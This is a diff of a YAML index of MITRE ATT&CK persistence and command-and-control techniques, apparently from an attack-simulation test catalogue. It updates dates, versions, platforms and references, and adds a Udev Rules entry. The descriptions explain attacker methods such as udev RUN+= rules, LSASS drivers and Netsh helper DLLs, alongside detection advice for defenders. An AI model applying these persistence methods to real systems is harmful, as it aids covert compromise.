       - 'Windows Registry: Windows Registry Key Creation'
       - 'Command: Command Execution'
@@ -39784,7 +40162,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1137.002
     atomic_tests: []
   T1547.008:
@@ -39827,7 +40204,7 @@ persistence:
         Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
 
         Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:34:43.405Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: LSASS Driver'
       x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -39852,12 +40229,11 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.008
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -39897,8 +40273,10 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -39906,13 +40284,13 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -39943,17 +40321,14 @@ persistence:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests: []
   T1053.002:
     technique:
-      modified: '2023-11-15T14:38:10.876Z'
+      modified: '2024-10-12T15:53:12.333Z'
       name: 'Scheduled Task/Job: At'
       description: |-
-        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
 
         On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
 
@@ -40016,7 +40391,7 @@ persistence:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Scheduled Job: Scheduled Job Creation'
@@ -40050,8 +40425,8 @@ persistence:
         url: https://man7.org/linux/man-pages/man1/at.1p.html
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Microsoft Scheduled Task Events Win10
         description: Microsoft. (2017, May 28). Audit Other Object Access Events.
           Retrieved June 27, 2019.
@@ -40060,6 +40435,10 @@ persistence:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Malicious Life by Cybereason
+        description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+          the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+        url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -40072,12 +40451,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.002
     atomic_tests: []
   T1556:
     technique:
-      modified: '2024-04-11T21:51:44.851Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Modify Authentication Process
       description: |-
         Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -40090,6 +40468,7 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Chris Ross @xorrior
       x_mitre_deprecated: false
@@ -40126,17 +40505,17 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - Network
-      - Azure AD
-      - Google Workspace
       - IaaS
-      - Office 365
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Process: Process Access'
@@ -40182,9 +40561,65 @@ persistence:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+    atomic_tests: []
+  T1546.017:
+    technique:
+      modified: '2024-11-11T19:05:38.708Z'
+      name: Udev Rules
+      description: |-
+        Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+        Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Eduardo González Hernández (@codexlynx)
+      - Eder Pérez Ignacio, @ch4ik0
+      - Wirapong Petshagun
+      - "@grahamhelton3"
+      - Ruben Groenewoud, Elastic
+      x_mitre_deprecated: false
+      x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+        in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+        specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+        2024) '
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'File: File Modification'
+      type: attack-pattern
+      id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+      created: '2024-09-26T17:02:09.888Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/017
+        external_id: T1546.017
+      - source_name: Ignacio Udev research 2024
+        description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+          persistence. Retrieved September 26, 2024.
+        url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+      - source_name: Elastic Linux Persistence 2024
+        description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+          -  A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+        url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+      - source_name: Reichert aon sedexp 2024
+        description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+          Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+        url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.007:
     technique:
@@ -40221,7 +40656,7 @@ persistence:
         Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</code>.
 
         Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:09:17.363Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Netsh Helper DLL'
       x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -40245,51 +40680,11 @@ persistence:
       - SYSTEM
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.007
     atomic_tests: []
   T1505.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Carlos Borges, @huntingneo, CIP
-      - Lucas da Silva Pereira, @vulcanunsec, CIP
-      - Kaspersky
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
-      type: attack-pattern
-      created: '2019-12-12T14:59:58.168Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1505.001
-        url: https://attack.mitre.org/techniques/T1505/001
-      - source_name: NetSPI Startup Stored Procedures
-        url: https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/
-        description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
-          SQL Server – Part 1: Startup Stored Procedures. Retrieved July 8, 2019.'
-      - source_name: Kaspersky MSSQL Aug 2019
-        url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
-        description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
-          attack on Microsoft SQL Server. Retrieved September 4, 2019.'
-      - source_name: Microsoft xp_cmdshell 2017
-        url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
-        description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
-          September 9, 2019.
-      - source_name: Microsoft CLR Integration 2017
-        url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
-        description: Microsoft. (2017, June 19). Common Language Runtime Integration.
-          Retrieved July 8, 2019.
-      - source_name: NetSPI SQL Server CLR
-        url: https://blog.netspi.com/attacking-sql-server-clr-assemblies/
-        description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
-          Retrieved July 8, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-10-15T16:05:24.007Z'
       name: SQL Stored Procedures
       description: "Adversaries may abuse SQL stored procedures to establish persistent
         access to systems. SQL Stored Procedures are code that can be saved and reused
@@ -40312,20 +40707,57 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Carlos Borges, @huntingneo, CIP
+      - Lucas da Silva Pereira, @vulcanunsec, CIP
+      - Kaspersky
+      x_mitre_deprecated: false
       x_mitre_detection: 'On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation:
         NetSPI Startup Stored Procedures) Consider enabling audit features that can
         log malicious startup activities.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
+      created: '2019-12-12T14:59:58.168Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1505/001
+        external_id: T1505.001
+      - source_name: Microsoft CLR Integration 2017
+        description: Microsoft. (2017, June 19). Common Language Runtime Integration.
+          Retrieved July 8, 2019.
+        url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
+      - source_name: Microsoft xp_cmdshell 2017
+        description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
+          September 9, 2019.
+        url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
+      - source_name: Kaspersky MSSQL Aug 2019
+        description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
+          attack on Microsoft SQL Server. Retrieved September 4, 2019.'
+        url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
+      - source_name: NetSPI Startup Stored Procedures
+        description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
+          SQL Server – Part 1: Startup Stored Procedures. Retrieved September 12,
+          2024.'
+        url: https://www.netspi.com/blog/technical-blog/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
+      - source_name: NetSPI SQL Server CLR
+        description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
+          Retrieved September 12, 2024.
+        url: https://www.netspi.com/blog/technical-blog/adversary-simulation/attacking-sql-server-clr-assemblies/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1556.004:
     technique:
@@ -40355,7 +40787,7 @@ persistence:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-12-14T23:14:26.107Z'
       name: Network Device Authentication
       description: |-
         Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -40379,12 +40811,10 @@ persistence:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.004:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:39.601Z'
       name: Dylib Hijacking
       description: |-
         Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -40468,11 +40898,10 @@ persistence:
         url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -40524,9 +40953,8 @@ persistence:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests:
     - name: Create local account with admin privileges - MacOS
@@ -40633,7 +41061,7 @@ persistence:
         url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
         description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
           Profilers. Retrieved June 24, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T21:35:12.049Z'
       name: 'Hijack Execution Flow: COR_PROFILER'
       description: |-
         Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -40671,14 +41099,12 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1574.012
     atomic_tests: []
 command-and-control:
   T1205.002:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-20T19:56:18.579Z'
       name: Socket Filters
       description: |-
         Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -40741,7 +41167,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1132.001:
     technique:
@@ -40799,7 +41224,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1132.001
     atomic_tests:
     - name: Base64 Encoded data.
@@ -40826,92 +41250,91 @@ command-and-control:
         name: sh
   T1568.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T15:55:16.111Z'
+      name: Domain Generation Algorithms
+      description: |-
+        Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
+
+        DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
+
+        Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: command-and-control
       x_mitre_contributors:
       - Ryan Benson, Exabeam
       - Barry Shteiman, Exabeam
       - Sylvain Gil, Exabeam
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
+
+        Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Flow'
       type: attack-pattern
+      id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
       created: '2020-03-10T17:44:59.787Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1568.002
         url: https://attack.mitre.org/techniques/T1568/002
-      - source_name: Cybereason Dissecting DGAs
-        url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
-        description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
-          Eight Real World DGA Variants. Retrieved February 18, 2019.'
-      - source_name: Cisco Umbrella DGA
-        url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
-        description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
-          Why so effective?. Retrieved February 18, 2019.
-      - source_name: Unit 42 DGA Feb 2019
-        url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
-        description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
-          Generation Algorithms (DGA). Retrieved February 19, 2019.'
-      - url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+        external_id: T1568.002
+      - source_name: Elastic Predicting DGA
+        description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
+          2). Predicting Domain Generation Algorithms with Long Short-Term Memory
+          Networks. Retrieved April 26, 2019.
+        url: https://arxiv.org/pdf/1611.00791.pdf
+      - source_name: Talos CCleanup 2017
         description: 'Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast
           Number of Machines at Risk. Retrieved March 9, 2018.'
-        source_name: Talos CCleanup 2017
-      - source_name: Akamai DGA Mitigation
-        url: https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html
-        description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
-          Domain Generation Algorithms. Retrieved February 18, 2019.
-      - url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
+        url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+      - source_name: Pace University Detecting DGA May 2017
+        description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
+          Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
+          April 26, 2019.
+        url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
+      - source_name: FireEye POSHSPY April 2017
         description: Dunwoody, M.. (2017, April 3). Dissecting One of APT29’s Fileless
           WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.
-        source_name: FireEye POSHSPY April 2017
+        url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
       - source_name: ESET Sednit 2017 Activity
-        url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
         description: 'ESET. (2017, December 21). Sednit update: How Fancy Bear Spent
           the Year. Retrieved February 18, 2019.'
+        url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
       - source_name: Data Driven Security DGA
-        url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
         description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
           2, Feature Engineering. Retrieved February 18, 2019.'
-      - source_name: Pace University Detecting DGA May 2017
-        url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
-        description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
-          Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
-          April 26, 2019.
-      - source_name: Elastic Predicting DGA
-        url: https://arxiv.org/pdf/1611.00791.pdf
-        description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
-          2). Predicting Domain Generation Algorithms with Long Short-Term Memory
-          Networks. Retrieved April 26, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
-      name: Domain Generation Algorithms
-      description: |-
